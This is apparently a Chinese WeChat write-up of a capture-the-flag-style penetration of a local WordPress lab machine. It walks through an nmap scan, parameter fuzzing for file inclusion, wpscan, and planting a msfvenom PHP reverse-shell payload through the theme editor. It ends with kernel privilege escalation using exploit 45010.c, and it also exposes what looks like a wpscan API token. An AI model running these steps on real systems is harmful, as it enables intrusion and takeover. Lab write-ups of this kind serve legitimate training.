Wordpress的渗透记录
声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者和此公众号不为此承担任何责任。
一、启动靶场
二、靶场渗透
Nmap -sn 192.168.126.0/24
Nmap -sV -sC -p- 192.168.126.139
发现了2个端口一个22一个80就很简单了,访问80端口
话不多说,目录扫描
Dord http://192.168.126.139 -X .txt,.php,.rar,.zip,.tar
发现三个目录,在secret.txt发现了
那么我们就尝试查看这个location.txt
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 7 -u http://192.168.126.139/index.php?FUZZ=location.txt
使用fuzz模糊匹配来爆破
发现是file那么我们读取一下
让我们使用secrettier360
没反应换一个image.Php
成功读取了/etc/passwd
有一句提示
find password.txt file in my directory:/home/saket,那么我们读取一下
记录一下有可能是密码,但是我们现在的一个问题是我们没有用户名
那么我们在来扫描一下目录,刚刚只是扫描了文件,现在扫目录
发现了wordpress的目录访问一下
发现是一个wordpress的网站,那么上工具wpscan
wpscan --url http://192.168.126.139/wordpress/ -e u --api-token 3PI8b5JDOnqJLSZQ9ShsQpx5qmOdDT5ahPEP1pX53Zs
发现了一个用户victor,又有了密码,尝试一下
密码不行,那么就换思路,在目录扫描的时候我们还发现了一个登陆页面
登陆进来
找到了一个可以写入的php编辑器,那么我们就弄一个反链就可以了
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.48.130 lport=4444 -o shell.php
生成成功
更新之后使用msfconsole来连接
那么路径在哪
反链成功
指令:
Python -c ‘import pyt;pty.spawn(“/bin/bash”)’
find / -perm -u=s -type f 2>/dev/null
Sudo -l
又发现了一个密码,看看是不是呢
密码不对,那么就看看内核提权了
尝试了很多只有这个45010.c可以提权
upload /usr/share/exploitdb/exploits/linux/local/45010.c /tmp/45010.c
上传文件之后加权限gcc编译一下,执行就可以完成提权
原文始发于微信公众号(攻防学堂):2024-Wordpress的渗透记录
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论